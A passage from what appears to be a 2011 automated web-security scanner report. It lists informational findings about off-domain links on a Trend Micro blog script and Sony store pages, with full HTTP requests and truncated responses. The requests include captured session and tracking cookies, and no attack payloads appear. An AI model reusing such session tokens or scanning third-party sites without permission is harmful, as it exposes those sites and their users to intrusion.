coords="142,14,180,49" href="http://www.youtube.com/trendmicroinc" target="_blank" alt="You Tube - Trend Micro"> </map>...[SNIP]... </div> <script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"> </script>...[SNIP]... <div style="width:83px;padding-top:4px;"><iframe src="http://www.facebook.com/plugins/like.php?locale=en_US&href=http://blog.trendmicro.com/xss-methods-also-seen-being-used-in-mass-compromises/&layout=button_count&show-faces=false&width=83px&action=like&colorscheme=light" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:83px; height:21px;" allowtransparency="true"> </iframe>...[SNIP]... <div style="padding-top:3px; width:108px;"><a href="http://twitter.com/share" class="twitter-share-button" data-url="http://blog.trendmicro.com/xss-methods-also-seen-being-used-in-mass-compromises/" data-text="XSS Methods Also Seen Being Used in Mass Compromises" data-count="horizontal"> Tweet</a> <script type="text/javascript" src="http://platform.twitter.com/widgets.js"> </script>...[SNIP]... </a> <a title="Technorati" rel="nofollow" href="http://technorati.com/faves?add=http://blog.trendmicro.com/android-malware-targets-china-mobile-subscribers/" target="_blank"> <img title="Technorati" src="http://blog.trendmicro.com/wp-content/themes/TM_2010theme/images/icons/technorati.png" alt="Technorati" border="0" /></a> <a title="NewsVine" rel="nofollow" target="_blank" href="http://www.newsvine.com/_tools/seed&save?u=http://blog.trendmicro.com/android-malware-targets-china-mobile-subscribers/" > <img src="http://blog.trendmicro.com/wp-content/themes/TM_2010theme/images/icons/newsvine.png" title="NewsVine" alt="NewsVine" border="0" /></a> <a title="MySpace" rel="nofollow" href="http://www.myspace.com/Modules/PostTo/Pages/?u=http://blog.trendmicro.com/android-malware-targets-china-mobile-subscribers/" target="_blank"> <img title="MySpace" src="http://blog.trendmicro.com/wp-content/themes/TM_2010theme/images/icons/myspace.png" alt="MySpace" border="0" /></a> <a title="Google" rel="nofollow" href="http://www.google.com/bookmarks/mark?op=edit&bkmk=http://blog.trendmicro.com/android-malware-targets-china-mobile-subscribers/" target="_blank"> <img title="Google" src="http://blog.trendmicro.com/wp-content/themes/TM_2010theme/images/icons/googlebookmark.png" alt="Google" border="0" />...[SNIP]... </a> <a title="del.icio.us" rel="nofollow" href="http://del.icio.us/post?url=http://blog.trendmicro.com/android-malware-targets-china-mobile-subscribers/" target="_blank"> <img title="del.icio.us" src="http://blog.trendmicro.com/wp-content/themes/TM_2010theme/images/icons/delicious.png" alt="del.icio.us" border="0" /></a> <a title="StumbleUpon" rel="nofollow" href="http://www.stumbleupon.com/submit?url=http://blog.trendmicro.com/android-malware-targets-china-mobile-subscribers/" target="_blank"> <img title="StumbleUpon" src="http://blog.trendmicro.com/wp-content/themes/TM_2010theme/images/icons/stumbleupon.png" alt="StumbleUpon" border="0" />...[SNIP]... </div>--><script src="http://widgets.twimg.com/j/2/widget.js"> </script>...[SNIP]... <div class="blogs" align="left"><a href="http://countermeasures.trendmicro.eu/" target="_blank"> CounterMeasures Blog </a>...[SNIP]... <div class="blogs" align="left"><a href="http://www.simplysecurity.com/" target="_blank"> Simply Security News</a>...[SNIP]... <div class="blogs" align="left"><a href="http://blog.trendmicro.de/#" target="_blank"> Trend Micro Blog [German]</a>...[SNIP]... <td width="148" height="195" align="right" valign="bottom"><a href="http://free.antivirus.com/" target="_blank"> <img src="http://blog.trendmicro.com/wp-content/themes/TM_2010theme/blogimages2010/freetools.jpg" alt="Trend Micro Free Tools" width="140" height="192" border="0">...[SNIP]... </script><script type="text/javascript" src="http://edge.quantserve.com/quant.js"> </script> <noscript><img src="http://pixel.quantserve.com/pixel/p-88yo-3lmt3UHI.gif" style="display: none;" border="0" height="1" width="1" alt="Quantcast"/> </noscript>...[SNIP]... </script><script src='//libs.coremetrics.com/eluminate.js'> </script>...[SNIP]...
12.2. http://blog.trendmicro.com/wp-content/plugins/flash-gallery/js/addOnLoad.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://blog.trendmicro.com
Path:
/wp-content/plugins/flash-gallery/js/addOnLoad.js
Issue detail
The page was loaded from a URL containing a query string:http://blog.trendmicro.com/wp-content/plugins/flash-gallery/js/addOnLoad.js?ver=1 The response contains the following link to another domain:
Request
GET /wp-content/plugins/flash-gallery/js/addOnLoad.js?ver=1 HTTP/1.1 Host: blog.trendmicro.com Proxy-Connection: keep-alive Referer: http://blog.trendmicro.com/?p=12640 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utma=44797537.706404181.1315350790.1315350790.1315350790.1; __utmb=44797537.3.10.1315350790; __utmc=44797537; __utmz=44797537.1315350790.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); fsr.s={"v":1,"rid":"1315350793273_559343","pv":3,"to":5,"c":"http://us.trendmicro.com/us/home/","lc":{"d1":{"v":3,"s":true}},"cd":1,"sd":1,"f":1315350984143}; bn_u=6923713914570485926; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fus.trendmicro.com%2Fus%2Fsearch%2F%3Fq%3Dxss%26search.x%3D2%26search.y%3D10%26search%3Dsearch%22%2C%22r%22%3A%22http%3A%2F%2Fus.trendmicro.com%2Fus%2Fhome%2F%22%2C%22t%22%3A1315350988973%2C%22u%22%3A%226923713914570485926%22%2C%22at%22%3A%7B%22docAttrs%22%3A%22%7B%5C%22collection%5C%22%3A%5C%22Website%5C%22%7D%22%7D%2C%22dd%22%3A%22http%3A%2F%2Fblog.trendmicro.com%2F%3Fp%3D12640%22%2C%22l%22%3A%22XSS%20Methods%20Also%20Seen%20Being%20Used%20in%20Mass%20Compromises%22%2C%22rb%22%3A%221%22%2C%22ri%22%3A%221%22%2C%22de%22%3A%7B%22ti%22%3A%22Search%22%2C%22nw%22%3A393%2C%22nl%22%3A141%7D%7D
Response
HTTP/1.1 200 OK Server: Apache Last-Modified: Thu, 02 Dec 2010 03:50:59 GMT ETag: "18c4d1-2c1-49665546aeec0" Accept-Ranges: bytes Content-Length: 705 Content-Type: application/x-javascript Date: Tue, 06 Sep 2011 18:16:27 GMT Connection: close /*http://core.trac.wordpress.org/changeset/6482*/ if(typeof addLoadEvent !== 'function'){addLoadEvent=(function(){var e=[],t,s,n,i,o,d=document,w=window,r='readyState',c='onreadystatechange',x=functi...[SNIP]... 1;clearInterval(t);while(i=e.shift())i();if(s)s[c]=''};return function(f){if(n)return f();if(!e[0]){d.addEventListener&&d.addEventListener("DOMContentLoaded",x,false);/*@cc_on@*//*@if(@_win32)d.write("<script id=__ie_onload defer src=//0> <\/scr"+"ipt>...[SNIP]...
12.3. http://store.sony.com/webapp/wcs/stores/servlet/CategoryDisplay
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://store.sony.com
Path:
/webapp/wcs/stores/servlet/CategoryDisplay
Issue detail
The page was loaded from a URL containing a query string:http://store.sony.com/webapp/wcs/stores/servlet/CategoryDisplay?catalogId=10551&storeId=10151&langId=-1&categoryId=16192&SR=nav:electronics:tv_hm_ent:bluray:shop_compare:ss The response contains the following links to other domains:http://blog.discover.sonystyle.com/ http://discover.sonystyle.com/sgnl/ http://itunes.apple.com/us/app/media-remote-for-iphone/id373459732?mt=8 http://nexus2.ensighten.com/sony/Bootstrap.js http://twitter.com/SonyStore http://www.facebook.com/sonyelectronics http://www.flickr.com/groups/sonycameraclub http://www.flickr.com/groups/sonycameraclub/ http://www.sonycreativesoftware.com/ http://www.twitter.com/SonyStore http://www.youtube.com/user/sonyelectronics https://market.android.com/details?id=com.sony.seconddisplay.view&feature=search_result https://sonysscom.112.2o7.net/b/ss/sonysscom/1/H.8--NS/0
Request
GET /webapp/wcs/stores/servlet/CategoryDisplay?catalogId=10551&storeId=10151&langId=-1&categoryId=16192&SR=nav:electronics:tv_hm_ent:bluray:shop_compare:ss HTTP/1.1 Host: store.sony.com Proxy-Connection: keep-alive Referer: http://www.sony.com/SonySearch/Search?mode=&action=search&pst=xss+playstation&pti=0&psti=0&first=1&sti=0&st=Laptop&ti=0 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: sony_cc=US; pref_07_20_2006=flash; lastLifestyleIndex=7; s_vi=[CS]v1|2733357F05161770-400001A440677BE1[CE]; ABC123=PxPoWN/jxgr+yTpJJZljY957NC3b7GIOlT0BMCwXPz5UAeOE8H1RTsBKnuR348WJQkXhpi8OhsKun1A=; sifrFetch=true; JSESSIONID=0000-iB7fM5Tlv4F_X_Hzj5a05_:14aelsmcl; WC_PERSISTENT=ImH92K9%2bsUdm%2fbC2K7x0esz36a4%3d%0a%3b2011%2d09%2d06+14%3a49%3a35%2e092%5f1315334975092%2d379806%5f0; c_m=undefinedwww.sony.comwww.sony.com; s_channel=%5B%5B%27Other%27%2C%271315352981909%27%5D%5D; TS5bbf46=9061f70286583c9d3554e696bebd0db0238741ed7a8234554e666b3f; mbox=session#1315352920400-736912#1315354843|PC#1315334914578-928682.19#1316562583|check#true#1315353043; ensRefId=http://store.sony.com/webapp/wcs/stores/servlet/StoreCatalogDisplay?langId=-1&storeId=10151&catalogId=10551&eid=437018621; ensUID=249118483jocCbfxsy2s; s_visit=1; s_sq=%5B%5BB%5D%5D; _ensChanVal=Other|1315352981909; __utma=171551074.654425757.1315352924.1315352924.1315352924.1; __utmb=171551074.2.10.1315352924; __utmc=171551074; __utmz=171551074.1315352924.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); fsr.s={"v":1,"rid":"1315352924764_554711","cp":{"cybershot":"N","innovation":"N","experts":"N"},"c":"http://store.sony.com/webapp/wcs/stores/servlet/StoreCatalogDisplay","pv":2,"lc":{"d0":{"v":2,"s":false}},"cd":0,"sd":0}; 71737897-VID=5110247826455; 71737897-SKEY=4068440463389764470; HumanClickSiteContainerID_71737897=STANDALONE; s_cc=true
Response
HTTP/1.1 200 OK Cteonnt-Length: 104997 Content-Type: text/html; charset=ISO-8859-1 Content-Language: en-US Content-Length: 104997 Vary: Accept-Encoding Date: Tue, 06 Sep 2011 18:49:52 GMT Connection: close Cache-Control: private <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html> <head> <meta http-equiv="X-UA-Compatible" content="IE=8" /> <link rel="canonical" ...[SNIP]... <!-- AllSitesHeadInclude --><script type="text/javascript" src="//nexus2.ensighten.com/sony/Bootstrap.js"> </script>...[SNIP]... <li class="socialItem"><a class="socialLogo facebookLogo seoImage" href="http://www.facebook.com/sonyelectronics" target="_blank"> Facebook</a></li> <li class="socialItem"><a class="socialLogo twitterLogo seoImage" href="http://www.twitter.com/SonyStore" target="_blank"> Twitter</a></li> <li class="socialItem"><a class="socialLogo bloggerLogo seoImage" href="http://blog.discover.sonystyle.com/" target="_blank"> Blog</a></li> <li class="socialItem"><a class="socialLogo youtubeLogo seoImage" href="http://www.youtube.com/user/sonyelectronics" target="_blank"> YouTube</a></li> <li class="socialItem"><a class="socialLogo flickrLogo seoImage" href="http://www.flickr.com/groups/sonycameraclub/" target="_blank"> Flickr</a>...[SNIP]... <li id="sgnlSpot" class="comBigPromo seoImg"><a class="comBigPromoLink seoImg" rel="Community: SGNL By Sony" href="http://discover.sonystyle.com/sgnl/#"> <h3>...[SNIP]... <li id="sonyCameraClubSpot" class="comBigPromo seoImg"><a class="comBigPromoLink seoImg" rel="Community: Sony Camera Club" href="http://www.flickr.com/groups/sonycameraclub" target="_blank"> <h3>...[SNIP]... <li id="twitterSpot" class="comBigPromo seoImg"><a class="comBigPromoLink seoImg" rel="Community: Twitter" href="http://twitter.com/SonyStore" target="_blank"> <h3>...[SNIP]... <li class="catItem"><a class="catItemLink" rel="Community: Facebook" href="http://www.facebook.com/sonyelectronics" target="_blank"> <span class="facebookLogo socialLogo">...[SNIP]... <li class="catItem"><a class="catItemLink" rel="Community: Twitter" href="http://www.twitter.com/SonyStore" target="_blank"> <span class="twitterLogo socialLogo">...[SNIP]... <li class="catItem"><a class="catItemLink" rel="Community: Sony Blog" href="http://blog.discover.sonystyle.com/" target="_blank"> <span class="bloggerLogo socialLogo">...[SNIP]... <li class="catItem"><a class="catItemLink" rel="Community: YouTube" href="http://www.youtube.com/user/sonyelectronics" target="_blank"> <span class="youtubeLogo socialLogo">...[SNIP]... <li class="catItem"><a class="catItemLink" rel="Community: Sony Camera Club" href="http://www.flickr.com/groups/sonycameraclub" target="_blank"> <span class="flickrLogo socialLogo">...[SNIP]... <div class="cta"><a rel="Body_Tier 1_Media Remote App for iPhone/iPad CTA" href="http://itunes.apple.com/us/app/media-remote-for-iphone/id373459732?mt=8#" class="redArrowLink externalCTA" target="_blank"> Explore Media Remote app for iPhone/iPad </a>...[SNIP]... <div class="cta"><a href="https://market.android.com/details?id=com.sony.seconddisplay.view&feature=search_result" class="redArrowLink externalCTA" target="_blank" rel="Body_Tier 1_Media Remote App for Android CTA"> Explore Media Remote app for Android </a>...[SNIP]... <li class="socialItem"><a class="socialLogo facebookLogo seoImage" href="http://www.facebook.com/sonyelectronics" target="_blank"> Facebook</a></li> <li class="socialItem"><a class="socialLogo twitterLogo seoImage" href="http://www.twitter.com/SonyStore" target="_blank"> Twitter</a></li> <li class="socialItem"><a class="socialLogo bloggerLogo seoImage" href="http://blog.discover.sonystyle.com/" target="_blank"> Blog</a></li> <li class="socialItem"><a class="socialLogo youtubeLogo seoImage" href="http://www.youtube.com/user/sonyelectronics" target="_blank"> YouTube</a></li> <li class="socialItem"><a class="socialLogo flickrLogo seoImage" href="http://www.flickr.com/groups/sonycameraclub/" target="_blank"> Flickr</a>...[SNIP]... <li id="" class="footerDirectoryListItem"><a href="http://www.sonycreativesoftware.com/" target="_blank" id="sonyCreativeGlobalFooterLink" rel="" class="directoryListingLink"> Sony Creative Software</a>...[SNIP]... <noscript><img src="https://sonysscom.112.2O7.net/b/ss/sonysscom/1/H.8--NS/0" height="1" width="1" border="0" alt="" /> </noscript>...[SNIP]...
12.4. http://store.sony.com/webapp/wcs/stores/servlet/SearchCatalog
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://store.sony.com
Path:
/webapp/wcs/stores/servlet/SearchCatalog
Issue detail
The page was loaded from a URL containing a query string:http://store.sony.com/webapp/wcs/stores/servlet/SearchCatalog?storeId=10151&langId=-1&catalogId=10551&in_dim_search=&keyword=dvd+cd&x=0&y=0 The response contains the following links to other domains:http://blog.discover.sonystyle.com/ http://discover.sonystyle.com/sgnl/ http://nexus2.ensighten.com/sony/Bootstrap.js http://twitter.com/SonyStore http://www.facebook.com/sonyelectronics http://www.flickr.com/groups/sonycameraclub http://www.flickr.com/groups/sonycameraclub/ http://www.sonycreativesoftware.com/ http://www.twitter.com/SonyStore http://www.youtube.com/user/sonyelectronics https://sonysscom.112.2o7.net/b/ss/sonysscom/1/H.8--NS/0
Request
GET /webapp/wcs/stores/servlet/SearchCatalog?storeId=10151&langId=-1&catalogId=10551&in_dim_search=&keyword=dvd+cd&x=0&y=0 HTTP/1.1 Host: store.sony.com Proxy-Connection: keep-alive Referer: http://store.sony.com/webapp/wcs/stores/servlet/CategoryDisplay?catalogId=10551&storeId=10151&langId=-1&categoryId=27898 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: sony_cc=US; pref_07_20_2006=flash; lastLifestyleIndex=7; s_vi=[CS]v1|2733357F05161770-400001A440677BE1[CE]; ABC123=PxPoWN/jxgr+yTpJJZljY957NC3b7GIOlT0BMCwXPz5UAeOE8H1RTsBKnuR348WJQkXhpi8OhsKun1A=; sifrFetch=true; JSESSIONID=0000-iB7fM5Tlv4F_X_Hzj5a05_:14aelsmcl; s_channel=%5B%5B%27Other%27%2C%271315352981909%27%5D%2C%5B%27Sony.com%27%2C%271315352999758%27%5D%5D; _ensChanVal=Sony.com|1315352999758; c_m=undefinedwww.sony.comwww.sony.com; mbox=session#1315352920400-736912#1315354869|PC#1315334914578-928682.19#1316562609|check#true#1315353069; ensRefId=http://store.sony.com/webapp/wcs/stores/servlet/CategoryDisplay?catalogId=10551&storeId=10151&langId=-1&categoryId=27898; ensUID=249118483jocCbfxsy2s; s_cc=true; __utma=171551074.654425757.1315352924.1315352924.1315352924.1; __utmb=171551074.4.10.1315352924; __utmc=171551074; __utmz=171551074.1315352924.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); WC_SESSION_ESTABLISHED=true; WC_PERSISTENT=30cc9Vvxqa6wQXKxm9IK6%2b5q3UA%3d%0a%3b2011%2d09%2d06+14%3a50%3a04%2e135%5f1315334975092%2d379806%5f10151%5f%2d1002%2c%2d1%2cUSD%5f10151; WC_ACTIVEPOINTER=%2d1%2c10151; WC_USERACTIVITY_-1002=%2d1002%2c10151%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2clUuR4QTxf%2f5YInkNp5DLwEIROKszrQDAawe%2bFWWFEzIDxeUPIdTDYWkA5rkgPjRPmhzB%2bzw9Hf%2fk%0avAS8zE7kY2MFDR47%2bjrT%2feKhy5Vt%2fbmyZW1xdwGzL47LAIe6LPqhTSHgSmDSMg08YS1X10MAnA%3d%3d; WC_GENERIC_ACTIVITYDATA=[1251466011%3atrue%3afalse%3a0%3aYVz6KpFhKSHbYH9BUDYIQv3N0r4%3d][com.ibm.commerce.context.base.BaseContext|10151%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|10551%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|10504%2610504%26null%26%2d2000][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null]; TS5bbf46=86861eed5e5f703c738ac8ed0955e019238741ed7a8234554e666b3fdb233202e0e51d0c222f7b4e21a038ea; fsr.s={"v":1,"rid":"1315352924764_554711","cp":{"cybershot":"N","innovation":"N","experts":"N"},"c":"http://store.sony.com/webapp/wcs/stores/servlet/CategoryDisplay","pv":4,"lc":{"d0":{"v":4,"s":true}},"cd":0,"sd":0}; 71737897-VID=5110247826455; 71737897-SKEY=4068440463389764470; HumanClickSiteContainerID_71737897=STANDALONE; s_visit=1; s_sq=sonysonystyle2007prod%3D%2526pid%253Dcontent%25253AS_Blu-Ray_Disc_Player%2526pidt%253D1%2526oid%253Dhttp%25253A//store.sony.com/wcsstore/SonyStyleStorefrontAssetStore/img/global/search_submit_arrow.gif%2526ot%253DIMAGE%26sonystyle2011dev%3D%2526pid%253Dhttp%25253A%25252F%25252Fstore.sony.com%25252Fwebapp%25252Fwcs%25252Fstores%25252Fservlet%25252FCategoryDisplay%25253FcatalogId%25253D10551%252526storeId%25253D10151%252526langId%25253D-1%252526categoryId%25253D16192%252526SR%25253Dnav%25253Aelectronics%25253Atv_hm_ent%25253Abluray%25253Ashop_compare%25253Ass%252523%25252Fbluray%2526oid%253Dhttp%25253A%25252F%25252Fstore.sony.com%25252Fwebapp%25252Fwcs%25252Fstores%25252Fservlet%25252FCategoryDisplay%25253FcatalogId%25253D10551%252526storeId%25253D10151%252526langId%2526ot%253DA
Response
HTTP/1.1 200 OK ntCoent-Length: 114876 Content-Type: text/html; charset=ISO-8859-1 Content-Language: en-US Date: Tue, 06 Sep 2011 18:50:12 GMT Content-Length: 114876 Connection: close Vary: Accept-Encoding Cache-Control: private <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="X-UA-Compatible" content="IE=8" /> <!-- AllSitesHeadInclude --><script type="text/javascript" src="//nexus2.ensighten.com/sony/Bootstrap.js"> </script>...[SNIP]... <li class="socialItem"><a class="socialLogo facebookLogo seoImage" href="http://www.facebook.com/sonyelectronics" target="_blank"> Facebook</a></li> <li class="socialItem"><a class="socialLogo twitterLogo seoImage" href="http://www.twitter.com/SonyStore" target="_blank"> Twitter</a></li> <li class="socialItem"><a class="socialLogo bloggerLogo seoImage" href="http://blog.discover.sonystyle.com/" target="_blank"> Blog</a></li> <li class="socialItem"><a class="socialLogo youtubeLogo seoImage" href="http://www.youtube.com/user/sonyelectronics" target="_blank"> YouTube</a></li> <li class="socialItem"><a class="socialLogo flickrLogo seoImage" href="http://www.flickr.com/groups/sonycameraclub/" target="_blank"> Flickr</a>...[SNIP]... <li id="sgnlSpot" class="comBigPromo seoImg"><a class="comBigPromoLink seoImg" rel="Community: SGNL By Sony" href="http://discover.sonystyle.com/sgnl/#"> <h3>...[SNIP]... <li id="sonyCameraClubSpot" class="comBigPromo seoImg"><a class="comBigPromoLink seoImg" rel="Community: Sony Camera Club" href="http://www.flickr.com/groups/sonycameraclub" target="_blank"> <h3>...[SNIP]... <li id="twitterSpot" class="comBigPromo seoImg"><a class="comBigPromoLink seoImg" rel="Community: Twitter" href="http://twitter.com/SonyStore" target="_blank"> <h3>...[SNIP]... <li class="catItem"><a class="catItemLink" rel="Community: Facebook" href="http://www.facebook.com/sonyelectronics" target="_blank"> <span class="facebookLogo socialLogo">...[SNIP]... <li class="catItem"><a class="catItemLink" rel="Community: Twitter" href="http://www.twitter.com/SonyStore" target="_blank"> <span class="twitterLogo socialLogo">...[SNIP]... <li class="catItem"><a class="catItemLink" rel="Community: Sony Blog" href="http://blog.discover.sonystyle.com/" target="_blank"> <span class="bloggerLogo socialLogo">...[SNIP]... <li class="catItem"><a class="catItemLink" rel="Community: YouTube" href="http://www.youtube.com/user/sonyelectronics" target="_blank"> <span class="youtubeLogo socialLogo">...[SNIP]... <li class="catItem"><a class="catItemLink" rel="Community: Sony Camera Club" href="http://www.flickr.com/groups/sonycameraclub" target="_blank"> <span class="flickrLogo socialLogo">...[SNIP]... <li class="socialItem"><a class="socialLogo facebookLogo seoImage" href="http://www.facebook.com/sonyelectronics" target="_blank"> Facebook</a></li> <li class="socialItem"><a class="socialLogo twitterLogo seoImage" href="http://www.twitter.com/SonyStore" target="_blank"> Twitter</a></li> <li class="socialItem"><a class="socialLogo bloggerLogo seoImage" href="http://blog.discover.sonystyle.com/" target="_blank"> Blog</a></li> <li class="socialItem"><a class="socialLogo youtubeLogo seoImage" href="http://www.youtube.com/user/sonyelectronics" target="_blank"> YouTube</a></li> <li class="socialItem"><a class="socialLogo flickrLogo seoImage" href="http://www.flickr.com/groups/sonycameraclub/" target="_blank"> Flickr</a>...[SNIP]... <li id="" class="footerDirectoryListItem"><a href="http://www.sonycreativesoftware.com/" target="_blank" id="sonyCreativeGlobalFooterLink" rel="" class="directoryListingLink"> Sony Creative Software</a>...[SNIP]... <noscript><img src="https://sonysscom.112.2O7.net/b/ss/sonysscom/1/H.8--NS/0" height="1" width="1" border="0" alt="" /> </noscript>...[SNIP]...
12.5. http://store.sony.com/webapp/wcs/stores/servlet/StoreCatalogDisplay
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://store.sony.com
Path:
/webapp/wcs/stores/servlet/StoreCatalogDisplay
Issue detail
The page was loaded from a URL containing a query string:http://store.sony.com/webapp/wcs/stores/servlet/StoreCatalogDisplay?langId=-1&storeId=10151&catalogId=10551 The response contains the following links to other domains:http://blog.discover.sonystyle.com/ http://discover.sonystyle.com/sgnl/ http://nexus2.ensighten.com/sony/Bootstrap.js http://twitter.com/SonyStore http://www.facebook.com/sonyelectronics http://www.flickr.com/groups/sonycameraclub http://www.flickr.com/groups/sonycameraclub/ http://www.sonycreativesoftware.com/ http://www.twitter.com/SonyStore http://www.youtube.com/user/sonyelectronics https://sonysscom.112.2o7.net/b/ss/sonysscom/1/H.8--NS/0
Request
GET /webapp/wcs/stores/servlet/StoreCatalogDisplay?langId=-1&storeId=10151&catalogId=10551 HTTP/1.1 Host: store.sony.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: sony_cc=US; pref_07_20_2006=flash; lastLifestyleIndex=7; s_cc=true; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2733357F05161770-400001A440677BE1[CE]; ABC123=PxPoWN/jxgr+yTpJJZljY957NC3b7GIOlT0BMCwXPz5UAeOE8H1RTsBKnuR348WJQkXhpi8OhsKun1A=; TS5bbf46=959617bd472776e6829f43567043c6625f8782db79e380b64e666affd5df5daf336f8e10
Response
HTTP/1.1 200 OK Cteonnt-Length: 75919 Content-Type: text/html; charset=ISO-8859-1 Content-Language: en-US Content-Length: 75919 Vary: Accept-Encoding Date: Tue, 06 Sep 2011 18:48:32 GMT Connection: close Cache-Control: private <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html> <head> <meta http-equiv="X-UA-Compatible" content="IE=8" /> <!-- AllSitesHeadInclude --><script type="text/javascript" src="//nexus2.ensighten.com/sony/Bootstrap.js"> </script>...[SNIP]... <li class="socialItem"><a class="socialLogo facebookLogo seoImage" href="http://www.facebook.com/sonyelectronics" target="_blank"> Facebook</a></li> <li class="socialItem"><a class="socialLogo twitterLogo seoImage" href="http://www.twitter.com/SonyStore" target="_blank"> Twitter</a></li> <li class="socialItem"><a class="socialLogo bloggerLogo seoImage" href="http://blog.discover.sonystyle.com/" target="_blank"> Blog</a></li> <li class="socialItem"><a class="socialLogo youtubeLogo seoImage" href="http://www.youtube.com/user/sonyelectronics" target="_blank"> YouTube</a></li> <li class="socialItem"><a class="socialLogo flickrLogo seoImage" href="http://www.flickr.com/groups/sonycameraclub/" target="_blank"> Flickr</a>...[SNIP]... <li id="sgnlSpot" class="comBigPromo seoImg"><a class="comBigPromoLink seoImg" rel="Community: SGNL By Sony" href="http://discover.sonystyle.com/sgnl/#"> <h3>...[SNIP]... <li id="sonyCameraClubSpot" class="comBigPromo seoImg"><a class="comBigPromoLink seoImg" rel="Community: Sony Camera Club" href="http://www.flickr.com/groups/sonycameraclub" target="_blank"> <h3>...[SNIP]... <li id="twitterSpot" class="comBigPromo seoImg"><a class="comBigPromoLink seoImg" rel="Community: Twitter" href="http://twitter.com/SonyStore" target="_blank"> <h3>...[SNIP]... <li class="catItem"><a class="catItemLink" rel="Community: Facebook" href="http://www.facebook.com/sonyelectronics" target="_blank"> <span class="facebookLogo socialLogo">...[SNIP]... <li class="catItem"><a class="catItemLink" rel="Community: Twitter" href="http://www.twitter.com/SonyStore" target="_blank"> <span class="twitterLogo socialLogo">...[SNIP]... <li class="catItem"><a class="catItemLink" rel="Community: Sony Blog" href="http://blog.discover.sonystyle.com/" target="_blank"> <span class="bloggerLogo socialLogo">...[SNIP]... <li class="catItem"><a class="catItemLink" rel="Community: YouTube" href="http://www.youtube.com/user/sonyelectronics" target="_blank"> <span class="youtubeLogo socialLogo">...[SNIP]... <li class="catItem"><a class="catItemLink" rel="Community: Sony Camera Club" href="http://www.flickr.com/groups/sonycameraclub" target="_blank"> <span class="flickrLogo socialLogo">...[SNIP]... <li class="socialItem"><a class="socialLogo facebookLogo seoImage" href="http://www.facebook.com/sonyelectronics" target="_blank"> Facebook</a></li> <li class="socialItem"><a class="socialLogo twitterLogo seoImage" href="http://www.twitter.com/SonyStore" target="_blank"> Twitter</a></li> <li class="socialItem"><a class="socialLogo bloggerLogo seoImage" href="http://blog.discover.sonystyle.com/" target="_blank"> Blog</a></li> <li class="socialItem"><a class="socialLogo youtubeLogo seoImage" href="http://www.youtube.com/user/sonyelectronics" target="_blank"> YouTube</a></li> <li class="socialItem"><a class="socialLogo flickrLogo seoImage" href="http://www.flickr.com/groups/sonycameraclub/" target="_blank"> Flickr</a>...[SNIP]... <li id="" class="footerDirectoryListItem"><a href="http://www.sonycreativesoftware.com/" target="_blank" id="sonyCreativeGlobalFooterLink" rel="" class="directoryListingLink"> Sony Creative Software</a>...[SNIP]... <noscript><img src="https://sonysscom.112.2O7.net/b/ss/sonysscom/1/H.8--NS/0" height="1" width="1" border="0" alt="" /> </noscript>...[SNIP]...
12.6. https://store.trendmicro.com/DRHM/store
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://store.trendmicro.com
Path:
/DRHM/store
Issue detail
